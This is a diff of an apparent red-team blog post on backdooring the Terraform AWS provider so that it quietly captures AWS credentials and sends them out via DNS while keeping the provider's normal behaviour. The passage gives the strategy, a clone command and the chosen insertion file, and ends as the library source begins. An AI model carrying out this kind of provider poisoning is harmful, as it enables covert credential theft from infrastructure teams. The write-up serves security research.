PirateShipInc/pirateship.github.io/_posts/2024-02-16-the-stealthy-terraform-trap.md

 In essence, Terraform uses a declarative configuration language to describe your desired infrastructure, making it possible to create an exact blueprint of your environment.
 This approach simplifies infrastructure management, automation, and collaboration.

+## Strategy, from the Greek stratēgia.

+Our approach to infiltrating an IaC pipeline hinges on the concept of <span class="underlined">"poisoning" a Terraform provider with malicious code</span>.
+Crucially, this code must operate stealthily, without altering the provider's expected functions.
+This method ensures that the teams managing the compromised pipeline remain unaware of any breach.
+This strategy aligns with our goals of maximizing impact while minimizing effort and detectability, drawing inspiration from the ancient Greek concept of stratēgia, where careful planning ensures victory with minimal conflict.

 ## Crafting an evil AWS Provider

-A malicious Terraform provider unlocks numerous possibilities for actions on a compromised host, limited only by the attacker's creativity.
-Our demonstration focuses on capturing and exfiltrating AWS Credentials using the AWS Terraform provider.
+Utilizing a malicious Terraform provider opens a wide array of attack vectors, all dependent on the ingenuity of the attacker.
+Our case study demonstrates the stealthy exfiltration of AWS Credentials by exploiting the AWS Terraform provider.

-We began by cloning the official AWS provider repository from GitHub:
+The process commenced with the cloning of the official AWS provider repository from GitHub:

 ```bash
 git clone "https://github.com/hashicorp/terraform-provider-aws.git"
 ```

-Once the repository is cloned, lets look inside and see it can offer for us.
-Our investigation into the provider's workings led us to crucial code segments responsible for handling AWS credentials, particularly in `internal/conns/config.go`.
+With the repository at our disposal, we delved into its structure to identify the optimal insertion point for our malicious payload.
+Our scrutiny focused on segments within `internal/provider/provider.go`, a file pivotal for executing the provider's configuration for AWS interactions.

-To execute our plan, we leveraged an external library designed to intercept these credentials during Terraform's operation and transmit them via DNS exfiltration—a method chosen for its effectiveness even in restricted environments.
+To facilitate our objective, we utilized a specialized external library crafted to clandestinely capture and exfiltrate credentials.
+This library employs DNS exfiltration, a technique selected for its proven efficacy, especially in networks with stringent outbound communication controls.

+The following code snippet highlights this library's source code.

 ```golang
 package awsdnsstatuscheck